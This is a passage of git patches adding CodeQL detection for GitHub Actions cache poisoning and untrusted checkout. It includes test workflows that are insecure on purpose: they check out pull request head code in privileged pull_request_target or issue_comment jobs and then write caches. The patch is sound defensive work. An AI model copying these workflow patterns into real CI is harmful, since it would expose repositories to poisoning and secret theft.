| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | @@ -18,9 +18,9 @@ nodes | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index 5bea5c7e52cf..2819bf62fdf6 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected @@ -1,8 +1,8 @@ edges | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | @@ -18,9 +18,9 @@ nodes | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | @@ -43,8 +43,8 @@ subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref deleted file mode 100644 index b0c41e712e50..000000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckout.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected new file mode 100644 index 000000000000..ff65e1658125 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected @@ -0,0 +1,6 @@ +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref new file mode 100644 index 000000000000..1192fcfe6168 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutError.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected similarity index 79% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected index 4913ed2d1008..628234f7e8b4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected @@ -1,6 +1,4 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | @@ -18,10 +16,6 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref new file mode 100644 index 000000000000..8c77a95b48c7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutWarning.ql From addedd0e2aa26f630e766ad00b589ff19fd484e9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 4 May 2024 23:29:55 +0200 Subject: [PATCH 230/707] Comment out unused source --- .../codeql/actions/dataflow/FlowSources.qll | 33 +++++++++---------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 6dd9b5d36171..a97dc8405f49 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -76,23 +76,22 @@ private predicate textEvent(string context) { ) } -bindingset[context] -private predicate repoNameEvent(string context) { - exists(string reg | - reg = - [ - // repo name - // Owner: All characters must be either a hyphen (-) or alphanumeric - // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name - "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name - "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo - ] - | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - +// bindingset[context] +// private predicate repoNameEvent(string context) { +// exists(string reg | +// reg = +// [ +// // repo name +// // Owner: All characters must be either a hyphen (-) or alphanumeric +// // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point +// "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name +// "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name +// "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo +// ] +// | +// Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) +// ) +// } bindingset[context] private predicate branchEvent(string context) { exists(string reg | From bb028e41d49899955ebf3e834f4bd126b4a35763 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:10:34 +0200 Subject: [PATCH 231/707] Add Cache Poisoning Query --- .../actions/security/CachePoisoningQuery.qll | 55 +++++++++++++++++++ ql/src/Security/CWE-349/CachePoisoning.ql | 36 ++++++++++++ .../CWE-349/.github/workflows/test1.yml | 22 ++++++++ .../CWE-349/.github/workflows/test2.yml | 17 ++++++ .../CWE-349/.github/workflows/test3.yml | 21 +++++++ .../CWE-349/.github/workflows/test4.yml | 17 ++++++ .../Security/CWE-349/CachePoisoning.expected | 3 + .../Security/CWE-349/CachePoisoning.qlref | 2 + 8 files changed, 173 insertions(+) create mode 100644 ql/lib/codeql/actions/security/CachePoisoningQuery.qll create mode 100644 ql/src/Security/CWE-349/CachePoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll new file mode 100644 index 000000000000..a9a28227957c --- /dev/null +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -0,0 +1,55 @@ +import actions + +abstract class CacheWritingStep extends Step { } + +class CacheActionUsesStep extends CacheWritingStep, UsesStep { + CacheActionUsesStep() { this.getCallee() = "actions/cache" } +} + +class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { + CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } +} + +class SetupJavaUsesStep extends CacheWritingStep, UsesStep { + SetupJavaUsesStep() { + this.getCallee() = "actions/setup-java" and + ( + exists(this.getArgument("cache")) or + exists(this.getArgument("cache-dependency-path")) + ) + } +} + +class SetupGoUsesStep extends CacheWritingStep, UsesStep { + SetupGoUsesStep() { this.getCallee() = "actions/setup-go" } +} + +class SetupNodeUsesStep extends CacheWritingStep, UsesStep { + SetupNodeUsesStep() { + this.getCallee() = "actions/setup-node" and + ( + exists(this.getArgument("cache")) or + exists(this.getArgument("cache-dependency-path")) + ) + } +} + +class SetupPythonUsesStep extends CacheWritingStep, UsesStep { + SetupPythonUsesStep() { + this.getCallee() = "actions/setup-python" and + ( + exists(this.getArgument("cache")) or + exists(this.getArgument("cache-dependency-path")) + ) + } +} + +class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { + SetupDotnetUsesStep() { + this.getCallee() = "actions/setup-dotnet" and + ( + exists(this.getArgument("cache")) or + exists(this.getArgument("cache-dependency-path")) + ) + } +} diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql new file mode 100644 index 000000000000..b3a9267703f8 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -0,0 +1,36 @@ +/** + * @name Cache Poisoning + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/cache-poisoning + * @tags actions + * security + * external/cwe/cwe-349 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.CachePoisoningQuery + +from Workflow w, PRHeadCheckoutStep checkout, LocalJob j +where + // TODO: (require to collect trigger types) + // - add push to default branch? + // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch + w.hasTriggerEvent([ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", + "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", + "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", + "watch", "workflow_run" + ]) and + // Workflow is privileged + w.isPrivileged() and + // The workflow checkouts untrusted code from a pull request + j = w.getAJob() and + j.getAStep() = checkout and + // The checkout step is followed by a cache writing step + j.getAStep() instanceof CacheWritingStep +select checkout, "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml new file mode 100644 index 000000000000..75e03886d48e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml @@ -0,0 +1,22 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml new file mode 100644 index 000000000000..6a6595d929ee --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml new file mode 100644 index 000000000000..2c684b6a02d5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml @@ -0,0 +1,21 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-java@v2 + with: + distribution: 'zulu' + java-version: '21' + cache: 'gradle' + cache-dependency-path: | + sub-project/*.gradle* + sub-project/**/gradle-wrapper.properties + - run: | + java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml new file mode 100644 index 000000000000..b5ea127ebd32 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-java@v2 + with: + distribution: 'zulu' + java-version: '21' + - run: | + java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected new file mode 100644 index 000000000000..e767e2f86222 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -0,0 +1,3 @@ +| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref new file mode 100644 index 000000000000..2cbd05800e68 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoning.ql + From 9417e1d164835cf59d9bcb6b73466e43ec58112e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:13:00 +0200 Subject: [PATCH 232/707] Classify checkout steps --- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../security/UntrustedCheckoutQuery.qll | 23 +++++++--- ql/src/Security/CWE-829/UnpinnedActionsTag.md | 44 ------------------- .../CWE-829/UntrustedCheckoutError.md | 0 .../CWE-829/UntrustedCheckoutWarning.md | 0 5 files changed, 19 insertions(+), 52 deletions(-) delete mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutError.md delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.md diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a97dc8405f49..580fb1d25ab1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -113,8 +113,8 @@ private predicate branchEvent(string context) { "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.merge_group\\.head_ref", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -146,6 +146,7 @@ private predicate emailEvent(string context) { "github\\.event\\.head_commit\\.committer\\.email", "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.merge_group\\.committer\\.email", "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] @@ -165,6 +166,7 @@ private predicate usernameEvent(string context) { "github\\.event\\.head_commit\\.committer\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.merge_group\\.committer\\.name", "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index c677915f504c..10a45830324e 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -40,6 +40,8 @@ predicate containsHeadSHA(string s) { "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", // heuristics "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" ], _, _) @@ -56,6 +58,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.merge_group\\.head_ref\\b", // heuristics "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", // env vars @@ -64,11 +67,17 @@ predicate containsHeadRef(string s) { ) } -/** Checkout of a Pull Request HEAD ref */ +/** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { } +/** Checkout of a Pull Request HEAD ref */ +abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } + +/** Checkout of a Pull Request HEAD ref */ +abstract class SHACheckoutStep extends PRHeadCheckoutStep { } + /** Checkout of a Pull Request HEAD ref using actions/checkout action */ -class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep { +class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( @@ -102,7 +111,7 @@ class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep { } /** Checkout of a Pull Request HEAD ref using actions/checkout action */ -class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep { +class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( @@ -132,7 +141,7 @@ class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep { } /** Checkout of a Pull Request HEAD ref using git within a Run step */ -class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { +class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -154,7 +163,7 @@ class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using git within a Run step */ -class GitSHACheckout extends PRHeadCheckoutStep instanceof Run { +class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -173,7 +182,7 @@ class GitSHACheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ -class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { +class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -194,7 +203,7 @@ class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ -class GhSHACheckout extends PRHeadCheckoutStep instanceof Run { +class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string line | this.getScript().splitAt("\n") = line and diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md deleted file mode 100644 index 855773e6a31b..000000000000 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.md +++ /dev/null @@ -1,44 +0,0 @@ -# Unpinned tag for 3rd party Action in workflow - -The individual jobs in a GitHub Actions workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them. This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on GitHub. For information on some of the steps an attacker could take, see "Security hardening for GitHub Actions." - -## Recommendation - -Pin an action to a full length commit SHA. This is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as 